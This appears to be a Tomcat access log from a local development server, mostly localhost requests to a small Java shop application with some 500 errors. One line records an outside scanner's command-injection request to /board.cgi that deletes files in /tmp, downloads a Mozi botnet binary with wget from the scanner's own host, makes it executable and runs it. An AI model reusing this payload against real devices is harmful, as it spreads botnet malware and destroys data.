0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:39 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:39 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 55
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/index HTTP/1.1" 200 16698 http-bio-8080-exec-4 1385
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo1.jpg HTTP/1.1" 304 - http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/css/1.css HTTP/1.1" 304 - http-bio-8080-exec-5 17
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/tu.jpg HTTP/1.1" 304 - http-bio-8080-exec-2 17
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo2.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 13
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo4.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 5
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo3.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo6.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 6
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/2.jpg HTTP/1.1" 304 - http-bio-8080-exec-11 3
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/18.jpg HTTP/1.1" 304 - http-bio-8080-exec-12 3
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo5.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 9
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/4.jpg HTTP/1.1" 304 - http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/lunbo7.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 9
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/13.jpg HTTP/1.1" 304 - http-bio-8080-exec-11 2
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/17.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 4
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/15.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 4
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/16.jpg HTTP/1.1" 304 - http-bio-8080-exec-1 5
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /eswz/img/14.jpg HTTP/1.1" 304 - http-bio-8080-exec-5 4
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:41 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:44 +0800] "GET /eswz/insertGoods HTTP/1.1" 500 4114 http-bio-8080-exec-11 17
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:49:54 +0800] "GET /eswz/insertGoods HTTP/1.1" 500 4114 http-bio-8080-exec-8 7
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:50:15 +0800] "GET /eswz/index HTTP/1.1" 200 16698 http-bio-8080-exec-4 29
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:50:22 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2677 http-bio-8080-exec-4 15
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:50:22 +0800] "GET /eswz/Login.css HTTP/1.1" 404 979 http-bio-8080-exec-4 2
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:50:29 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:50:30 +0800] "GET /eswz/index HTTP/1.1" 200 16766 http-bio-8080-exec-5 26
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:50:41 +0800] "GET /eswz/insertGoods HTTP/1.1" 500 14984 http-bio-8080-exec-10 53
112.248.108.116 - - [14/Nov/2022:19:52:58 +0800] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://112.248.108.116:60936/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:58:59 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:58:59 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 42
0:0:0:0:0:0:0:1 - - [14/Nov/2022:19:58:59 +0800] "GET /eswz/index HTTP/1.1" 200 16698 http-bio-8080-exec-4 480
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:00:47 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:00:47 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:00:47 +0800] "GET /eswz/index HTTP/1.1" 200 16698 http-bio-8080-exec-4 885
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:05:15 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:05:15 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 47
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:05:16 +0800] "GET /eswz/index HTTP/1.1" 200 7628 http-bio-8080-exec-4 492
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:46 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:46 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 42
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/index HTTP/1.1" 200 17100 http-bio-8080-exec-4 502
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/img/9.jpg HTTP/1.1" 200 13852 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/img/7.jpg HTTP/1.1" 200 7192 http-bio-8080-exec-6 4
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/img/8.jpg HTTP/1.1" 200 9284 http-bio-8080-exec-2 11
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/img/6.jpg HTTP/1.1" 200 18778 http-bio-8080-exec-7 5
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/img/1.jpg HTTP/1.1" 200 33424 http-bio-8080-exec-9 5
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:47 +0800] "GET /eswz/img/3.jpg HTTP/1.1" 200 28860 http-bio-8080-exec-8 11
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:50 +0800] "GET /eswz/index?pageNo=2&pageSize=8&classification.classificationid=&name= HTTP/1.1" 200 8791 http-bio-8080-exec-5 31
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:50 +0800] "GET /eswz/img/5.jpg HTTP/1.1" 200 22448 http-bio-8080-exec-5 2
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:06:53 +0800] "GET /eswz/index?classification.classificationid=1 HTTP/1.1" 500 15014 http-bio-8080-exec-4 64
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:07:01 +0800] "GET /eswz/index?classification.classificationid=2 HTTP/1.1" 500 15014 http-bio-8080-exec-8 14
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:10:14 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:10:14 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 35
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:10:14 +0800] "GET /eswz/index HTTP/1.1" 500 14917 http-bio-8080-exec-4 454
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:10:53 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:10:53 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 31
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:10:53 +0800] "GET /eswz/index HTTP/1.1" 500 14067 http-bio-8080-exec-4 372
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:11:46 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:11:46 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 32
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:11:46 +0800] "GET /eswz/index HTTP/1.1" 500 18676 http-bio-8080-exec-4 494
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:12:45 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:12:45 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 29
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:12:45 +0800] "GET /eswz/index HTTP/1.1" 200 16698 http-bio-8080-exec-4 449
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:12:50 +0800] "GET /eswz/index?pageNo=3&pageSize=8&classification.classificationid=&name= HTTP/1.1" 200 9921 http-bio-8080-exec-5 36
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:12:54 +0800] "GET /eswz/index?pageNo=1&pageSize=8&classification.classificationid=&name= HTTP/1.1" 200 16698 http-bio-8080-exec-6 30
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:25:17 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:25:17 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 44
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:25:17 +0800] "GET /eswz/index HTTP/1.1" 200 16698 http-bio-8080-exec-4 420
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:27:38 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:27:38 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 40
0:0:0:0:0:0:0:1 - - [14/Nov/2022:20:27:38 +0800] "GET /eswz/index HTTP/1.1" 200 7628 http-bio-8080-exec-4 425
